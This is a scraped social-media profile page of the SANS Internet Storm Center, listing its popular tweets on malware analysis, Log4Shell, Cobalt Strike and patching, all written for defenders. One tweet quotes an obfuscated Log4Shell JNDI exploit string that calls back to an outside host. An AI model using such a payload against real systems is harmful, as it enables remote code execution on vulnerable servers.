Pikagi
SANS.edu Internet Storm Center Profile Banner
SANS.edu Internet Storm Center Profile
SANS.edu Internet Storm Center

@sans_isc

115,971
Followers
86
Following
2,374
Media
13,112
Statuses

@sans_isc @infosec .exchange - - Global Network Security Information Sharing Community -

Jacksonville, FL, USA
https://t.co/TOm0H7N1ZS
Joined June 2007
Don't wanna be here? Send us removal request.
Last Seen Profiles
Kris

@Kris72721261608

Ryan walker

@Ryanwal91972302

cнємιcαℓ єηgιηєєя

@ma1999AL

лиля́ кебáб

@lilydavay

izzmt41

@can_berkkk

gabs

@gaabyxxo

ikemen (gender neutral)

@limeicebreakers

Thomas Morris

@mozzydev

Jiří Baňka

@jiri_banka

Hairball

@Opinionsharky

Charlie Rose

@Charlie12635375

Saarah Party

@part_saara

BYHLY

@BYHLY0621YM

febrinatia

@febrinatiaa

BlackDog

@BlackDo40049184

Teresa Laudermilk

@sisteresaokie

acervo gatinhos

@acervogatinhos

trollz 69🐊

@taylorcitypage

Yasmine

@YasmineAmirah__

ジャックポット

@5UwqglpwwYBsKH4

Lipasam

@LipasamSevilla

Ngân Ngọc

@NgnNgc142323

Eulia

@bae_Eulia

bad siberian

@bigup_universe

Brawl Stars

@BrawlStars

Medicina Esportiva

@medicina_esport

pecinta IBU2, STW, BINOR & JANDA

@stw_pdg

Skella 💀

@skellatin

Tyler 🏴‍☠️

@Tyler_Rongione

David Vargas Casado

@DvdVargasCasado

DUMANBET

@DumanbetO

indispensable David

@davidchibuike_

Codywulfy - Commissions Closed

@codywulfyarts

psterboy.

@psterboy

CONTEXT VIDEOS

@Context2X

Madalene Wayner

@MadaleneWa9568

@sans_isc
SANS.edu Internet Storm Center
@sans_isc
4 years
To whoever is trying to run these Python backdoors on our F5 #BigIP honeypot: Slow down... it doesn't work because you keep overwriting your files. Or randomize your filenames better.
Tweet media one
18
215
889
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Hunting phishing websites with favicon hashes
Tweet media one
6
189
618
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
11 months
Brute-Force ZIP Password Cracking with : FP Fix
Tweet media one
3
115
544
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 months
A quick note about xz-utils backdoor: 1 - luckily, this was caught early. 2 - most run xz-utils 5.2/5.4. 5.6 is bad. 3 - quick check: `xz -V` 4 - Thanks to people who paid attention
Reported Supply Chain Compromise Affecting XZ Utils Data Compression Library, CVE-2024-3094 | CISA
www.cisa.gov
22
202
536
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
1 year
Brute-Force ZIP Password Cracking with
Tweet media one
4
78
460
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
4 years
Sooty: SOC Analyst's All-in-One Tool
Tweet media one
7
118
454
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Example of how attackers are trying to push crypto miners via Log4Shell
Tweet media one
5
154
448
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
2 years
guess we no longer have to worry about CVE-2022-1388 if this makes the rounds... @f5 #bigip
Tweet media one
9
134
393
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
#log4shell is now a @cnn headline. This means: This is no longer an emergency. Going back to infocon green. Log4j will be a multi-year marathon. Do not treat it like a sprint or you will run out of breath quickly.
8
88
386
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Wireshark 3.6.0 Released
Tweet media one
2
40
346
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
4 years
Broken phishing accidentally exploiting Outlook zero-day
Tweet media one
5
127
326
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Let's see if a kitten picture will get us to 100k followers by the end of the month ;-) #networkcats #kittens #networksupportkitten #evilbutcute
Tweet media one
28
44
310
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
2 years
Over 20 thousand servers have their iLO exposed to the internet, many are outdated and vulnerable
Tweet media one
7
120
305
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Decrypting Cobalt Strike Traffic With a "Leaked" Private Key
Tweet media one
0
102
278
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Wireshark 3.4.4 Released
Tweet media one
0
75
263
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Top sources of CVE-2021-44228 exploit attempts. 45.155.205.233 (hostway[.]ru), 171.25.193 (tor exits) 185.220.100.242 (tor exit) 18.27.197.252 (MIT[.]edu) #log4j2 #log4j #cve202144228
Tweet media one
11
138
258
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
New Release of Sysmon Adding Detection for Process Tampering
Tweet media one
2
70
253
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Active Directory Certificate Services (ADCS - PKI) domain admin vulnerability
Tweet media one
0
117
248
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
2 years
OpenSSL 3.0.7 is out. TL&DR: Punycode issue with international domains used in certs. Needs CA to sign malicious cert. Doesn't look like a "huge deal" IMHO. Relax.. Patch.. Repeat... #openssl
4
111
248
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
ISC diary: Emotet returns on Monday 2021-11-15, and @malware_traffic reviews recent activity
Tweet media one
3
126
248
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Seeing now #log4shell exploit attempts that obfuscate: ${jndi:${lower:l}${lower:d}a${lower:p}://world80[.]log4j[.]bin${upper:a}ryedge[.]io:80/callback} and also ldaps vs ldap. This particular attempt is from Binaryedge (researcher scans)
Tweet media one
4
102
245
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
4 years
so far I found 4 domains registered yesterday with the keyword "Beirut". They appear to be inactive so far. Be careful out there. Verify any entities asking for help. #beirut #lebanon
Tweet media one
0
155
222
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Simple Powershell Ransomware Creating a 7Z Archive of your Files
Tweet media one
1
82
218
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
TCPView v4.0 Released
Tweet media one
1
66
227
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
1 year
Detecting (Malicious) OneNote Documents
Tweet media one
0
64
214
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Video: Cobalt Strike & DNS - Part 1
Tweet media one
1
70
204
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Decrypting Cobalt Strike Traffic With Keys Extracted From Process Memory
Tweet media one
0
61
207
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Decoding Cobalt Strike Traffic
1
77
202
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Malware Analysis with elastic-agent and Microsoft Sandbox
Tweet media one
0
52
190
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
2 years
Please remember: Port 445 is just ONE of the ports that may reach #RPC (CVE-2022-26809) on Windows. #MSRPC does Port 135 (and high port) or in some cases HTTP as well. Don't "close some ports" but "only open ports you need open". #allowlist #dontblocklist
3
74
193
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
We are so far seeing 3 main types of useragents exploiting #log4jshell : - "bingsearchlib[.]com" (not related to Bing/MSFT AFAIK) - modified AutoMate 1.0 user agent - user-agent with Base64 encoded exploit.
Tweet media one
5
87
191
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
5 years
Tip: BASE64 Encoded PowerShell Scripts are Recognizable by the Amount of Letter As
Tweet media one
3
95
189
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
CyberChef: Analyzing OOXML Files for URLs
Tweet media one
1
76
190
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
2 years
New Microsoft Office Attack Vector via "ms-msdt" Protocol Scheme
Tweet media one
2
78
187
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
2 years
James Webb JPEG With Malware
Tweet media one
5
56
183
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
2 years
The #msdt 0-day currently being exploited can be blocked by removing the handler. Note that this may block legit uses (but not sure there are any/enough to not apply this workaround).
@DidierStevens
Didier Stevens
@DidierStevens
2 years
FYI:
Tweet media one
Tweet media two
Tweet media three
2
78
362
2
100
186
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
2 years
And Here They Come Again: DNS Reflection Attacks #dns #abitofarant #oneofthosedays
Tweet media one
2
48
175
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
4 years
F5 BigIP vulnerability exploitation followed by a backdoor implant attempt
Tweet media one
0
72
172
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
PCAPs and Beacons
Tweet media one
1
52
177
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
2 years
ISC Diary: @malware_traffic reviews new #MetaStealer malware first seen on 2022-03-30
Tweet media one
1
58
168
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
4 years
Attackers Exploiting WebLogic Servers via CVE-2020-14882 to install Cobalt Strike @oracle #weblogic
Tweet media one
1
70
172
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
4 years
Analysis of a triple-encrypted AZORult downloader
Tweet media one
2
91
171
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
2 years
Excel 4 Emotet Maldoc Analysis using CyberChef
Tweet media one
6
53
164
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
2 years
First Exploitation of Follina Seen in the Wild
Tweet media one
3
76
165
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Finding Metasploit & Cobalt Strike URLs
Tweet media one
0
72
165
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
PuTTy And FileZilla Use The Same Fingerprint Registry Keys
Tweet media one
1
39
161
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
4 years
Current Top IPs scanning for #BigIP #CVE20205902 @f5Networks . cve-2020-5902 117.107.193.98 - Chinese EDU 103.220.209.47 - India Broadband 93.173.92.102 -Israel ISP 18.185.237.34 -Amazon EU 58.49.50.122 - Chinanet 52.119.83.108 -US Mobile ISP 179.9.166.185 -Chile ISP
7
75
152
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
4 years
The Microsoft DNS #sigred vulnerability (CVE-2020-1350) : drop what you are doing and patch it now (if this isn’t what your are doing..) if you don’t run MSFT DNS: double check...
3
101
152
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
December 2021 ISC Forensic Challenge - Review the #pcap for a chance at winning a Raspberry Pi
Tweet media one
3
50
149
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
2 years
Quickie: CyberChef & Microsoft Script Decoding
Tweet media one
2
48
148
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
RCE in log4j, Log4Shell, or how things can get bad quickly
Tweet media one
1
75
149
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
ISC diary - @malware_traffic presents a #pcap of infection traffic for a new #TrafficAnalysisQuiz
Tweet media one
3
31
144
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Facebook Outage: Yes, its DNS (sort of). A super quick analysis of what is going on.
Tweet media one
2
79
143
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
4 years
Windows 10 Built-in Packet Sniffer - PktMon
Tweet media one
1
65
141
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
4 years
Quick Tip: Cobalt Strike Beacon Analysis
Tweet media one
0
39
137
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
2 years
HTML phishing attachments - now with anti-analysis features
Tweet media one
4
54
134
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
2 years
ISC Diary: @malware_traffic reviews #TA570 #CVE -2022-30190 ( #Follina ) exploit (ms-msdt) for #Qakbot
Tweet media one
1
59
132
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
2 years
Attackers are abusing MSBuild to evade defenses and implant Cobalt Strike beacons
Tweet media one
0
62
131
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Quickie: Extracting HTTP URLs With tshark
Tweet media one
2
37
132
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
5 years
Tip: Sysmon Will Log DNS Queries
Tweet media one
0
56
131
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
1 year
CyberChef Version 10 Released
Tweet media one
1
51
130
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Shipping to Elasticsearch Microsoft DNS Logs
Tweet media one
0
37
131
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Agent Tesla hidden in a historical anti-malware tool
Tweet media one
1
49
124
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
4 years
After the initial flurry of scanning for the #WebLogic flaw yesterday, we are now seeing some "actual" exploit attempts. And of course, people poping calc.exe. If your WebLogic server has a Calculator running this morning: You have a problem!
Tweet media one
2
79
129
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
4 years
DeepBlueCLI: Powershell Threat Hunting
Tweet media one
0
55
127
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
4 years
ISC diary: @malware_traffic reviews an infection from 2020-10-30 for Emotet -> Qakbot -> more Emotet
Tweet media one
1
40
127
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
2 years
ISC Diary: @malware_traffic reviews how #Emotet #spambot traffic no longer uses 0.0.0.0
Tweet media one
0
44
121
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
2 years
ISC Diary: @malware_traffic reviews #Matanbuchus activity leading to #CobaltStrike
Tweet media one
2
42
123
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Building an IDS Sensor with Suricata & Zeek with Logs to ELK
Tweet media one
3
42
125
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
2 years
Translating Saitama's DNS tunneling messages
Tweet media one
1
48
118
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
1 year
Bypassing PowerShell Strong Obfuscation
Tweet media one
0
34
119
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Hunting for Phishing Sites Masquerading as Outlook Web Access
Tweet media one
3
35
122
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
4 years
Quick Tip: Extracting all VBA Code from a Maldoc
Tweet media one
0
49
120
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
.docx With Embedded EXE
Tweet media one
0
34
115
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
YARA and CyberChef
Tweet media one
0
32
113
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
4 years
Malicious Excel Sheet with a NULL VT Score
Tweet media one
4
49
112
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
4 years
Quick Tip: Extracting all VBA Code from a Maldoc - JSON Format
Tweet media one
1
29
116
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Summer of SAM - incorrect permissions on Windows 10/11 hives
Tweet media one
2
51
115
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Maldoc Analysis With CyberChef
Tweet media one
0
34
115
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
ISC diary - @malware_traffic reviews a #Qakbot ( #Qbot ) infection with #CobaltStrike
Tweet media one
0
38
112
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Malware analysis - From small BAT file to Mass Logger infostealer
Tweet media one
0
38
113
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
4 years
ISC diary: @malware_traffic offers another traffic anlaysis quiz with Windows-based malware traffic
Tweet media one
3
27
114
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
2 years
Traffic Light Protocol (TLP) 2.0 is here
Tweet media one
1
63
109
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
2 years
Analyzing Obfuscated VBS with CyberChef
Tweet media one
0
29
111
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
4 years
Analyzing FireEye Maldocs
Tweet media one
0
46
109
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
6 years
Meltdown and Spectre: clearing up the confusion
3
101
111
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
ISC diary: @malware_traffic analyzes this month's forensic quiz #BazaLoader #CobaltStrike #AnchorDNS
Tweet media one
0
46
108
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
ISC diary - @malware_traffic reviews #malspam pushing #GuLoader for #Remcos #RAT ( #RemcosRAT )
Tweet media one
2
48
109
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
ISC diary by @malware_traffic - Excel spreadsheet --> enable macros --> #SystemBC --> #CobaltStrike
Tweet media one
2
51
106
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Log4Shell exploited to implant coin miners
Tweet media one
0
38
105
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
2 years
Analyzing a Phishing Word Document
Tweet media one
1
37
100
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
2 years
ISC Diary: @malware_traffic reviews an example of #CobaltStrike from an #Emotet infection
Tweet media one
1
47
106
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Log4j / Log4Shell Followup: What we see and how to defend #log4shell #log4j #log4js
Tweet media one
1
57
105
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
5 years
Local Malware Analysis with Malice
Tweet media one
0
30
103
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
4 years
ISC diary by @malware_traffic : yet another traffic anlaysis quiz with Windows-based malware traffic
Tweet media one
4
30
105
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
1 year
ISC Diary: @malware_traffic reviews DocuSign-themed email leads to script-based infection
Tweet media one
0
28
101
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Example of Cleartext Cobalt Strike Traffic (Thanks Brad)
Tweet media one
0
27
102
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
4 years
Weaponized RTF Document Generator & Mailer in PowerShell
Tweet media one
2
36
101
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
Jumping into Shellcode
Tweet media one
3
41
100
@sans_isc
SANS.edu Internet Storm Center
@sans_isc
3 years
More Undetected PowerShell Dropper
Tweet media one
0
24
101